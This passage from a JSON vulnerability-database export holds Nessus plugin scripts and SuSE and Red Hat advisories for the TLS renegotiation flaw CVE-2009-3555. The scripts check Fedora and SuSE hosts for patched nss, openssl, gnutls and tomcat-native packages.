script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"nss-util-3.12.5-1.fc12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nss-util\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:43:25", "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)", "edition": 24, "published": "2009-11-18T00:00:00", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6656)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2009-11-18T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_COMPAT-OPENSSL097G-6656.NASL", "href": "https://www.tenable.com/plugins/nessus/42840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42840);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6656)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6656.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"compat-openssl097g-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"compat-openssl097g-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.19.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:13:14", "description": "Mozilla NSS was updated to version 3.12.6.\n\nThis fixes all currently known issues in mozilla-nss, and also\nimplements the new TLS/SSL renegotiation handling. (CVE-2009-3555)", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 Security Update : Mozilla (SAT Patch Number 2239)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:zlib-32bit", "p-cpe:/a:novell:suse_linux:11:zlib", "p-cpe:/a:novell:suse_linux:11:mozilla-nss-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-nss", "p-cpe:/a:novell:suse_linux:11:mozilla-nss-tools", "p-cpe:/a:novell:suse_linux:11:libfreebl3", "p-cpe:/a:novell:suse_linux:11:libfreebl3-32bit"], "id": "SUSE_11_LIBFREEBL3-100406.NASL", "href": "https://www.tenable.com/plugins/nessus/50930", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50930);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla (SAT Patch Number 2239)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla NSS was updated to version 3.12.6.\n\nThis fixes all currently known issues in mozilla-nss, and also\nimplements the new TLS/SSL renegotiation handling. (CVE-2009-3555)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554085\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2239.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:zlib-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libfreebl3-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-nss-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-nss-tools-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"zlib-1.2.3-106.34\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libfreebl3-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nss-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nss-tools-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"zlib-1.2.3-106.34\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"zlib-32bit-1.2.3-106.34\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libfreebl3-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-nss-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-nss-tools-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"zlib-1.2.3-106.34\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"libfreebl3-32bit-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"zlib-32bit-1.2.3-106.34\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.12.6-3.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"zlib-32bit-1.2.3-106.34\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:07:15", "description": "The SSL-renegotiation 'authentication gap' has been fixed in gnutls.\nCVE-2009-3555 has been assigned to this issue.", "edition": 23, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "id": "SUSE_11_3_GNUTLS-101025.NASL", "href": "https://www.tenable.com/plugins/nessus/75521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3388.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75521);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)\");\n script_summary(english:\"Check for the gnutls-3388 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SSL-renegotiation 'authentication gap' has been fixed in gnutls.\nCVE-2009-3555 has been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"gnutls-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-devel-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra-devel-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra26-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls26-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.8.6-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:00", "description": "Update to 1.1.18, implementing a mitigation for CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-12-18T00:00:00", "title": "Fedora 12 : tomcat-native-1.1.18-1.fc12 (2009-12229)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-18T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:tomcat-native"], "id": "FEDORA_2009-12229.NASL", "href": "https://www.tenable.com/plugins/nessus/43327", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12229.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43327);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"FEDORA\", value:\"2009-12229\");\n\n script_name(english:\"Fedora 12 : tomcat-native-1.1.18-1.fc12 (2009-12229)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.1.18, implementing a mitigation for CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://marc.info/?l\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l\"\n );\n # http://marc.info/?l=tomcat-\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-\"\n );\n # http://marc.info/?l=tomcat-dev&m=125900987921402&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-dev&m=125900987921402&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032838.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb03b77e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat-native package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"tomcat-native-1.1.18-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat-native\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:25:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update was not able to associate already sent data to a renegotiated connection. This allowed man-in-the-middle attackers to inject HTTP requests in a HTTPS session without being noticed. For example Apache's mod_ssl was vulnerable to this kind of attack because it uses openssl. It is believed that this vulnerability is actively exploited in the wild to get access to HTTPS protected web-sites. Please note that renegotiation will be disabled for any application using openssl by this update and may cause problems in some cases. Additionally this attack is not limited to HTTP.\n#### Solution\nThere is no work-around known. Please install the update. Moblin packages will be released later.", "edition": 1, "modified": "2009-11-18T09:50:39", "published": "2009-11-18T09:50:39", "id": "SUSE-SA:2009:057", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00009.html", "type": "suse", "title": "man-in-the-middle attack in openssl", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:36", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.", "modified": "2017-09-08T12:08:02", "published": "2010-03-25T04:00:00", "id": "RHSA-2010:0165", "href": "https://access.redhat.com/errata/RHSA-2010:0165", "type": "redhat", "title": "(RHSA-2010:0165) Moderate: nss security update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:03", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "The IBM 1.4.2 SR13-FP4 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handle session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix 